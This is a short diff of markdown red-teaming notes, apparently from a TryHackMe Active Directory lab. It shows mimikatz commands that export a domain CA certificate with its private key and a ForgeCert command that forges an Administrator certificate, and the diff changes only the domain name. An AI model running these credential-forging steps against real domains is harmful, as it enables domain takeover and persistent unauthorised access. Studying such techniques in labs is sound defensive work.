0xIapetus/RedTeamingNotes/All_About_Windows.md

 `mimikatz # crypto::cng`
 `mimikatz # crypto::certificates /systemstore:local_machine /export`The exported certificates will be stored in both PFX and DER format to disk, The za-THMDC-CA.pfx certificate is the one we are particularly interested in.
 In order to export the private key, a password must be used to encrypt the certificate.
 By default, Mimikatz assigns the password of mimikatz.

-`C:\Users\aaron.jones>C:\Tools\ForgeCert\ForgeCert.exe --CaCertPath za-THMDC-CA.pfx --CaCertPassword mimikatz --Subject CN=User --SubjectAltName Administrator@za.tryhackme.loc --NewCertPath fullAdmin.pfx --NewCertPassword Password123 `
+`C:\Users\aaron.jones>C:\Tools\ForgeCert\ForgeCert.exe --CaCertPath za-THMDC-CA.pfx --CaCertPassword mimikatz --Subject CN=User --SubjectAltName Administrator@za.NAI.loc --NewCertPath fullAdmin.pfx --NewCertPassword Password123 `

     CaCertPath - The path to our exported CA certificate.
     CaCertPassword - The password used to encrypt the certificate.
 By default, Mimikatz assigns the password of mimikatz.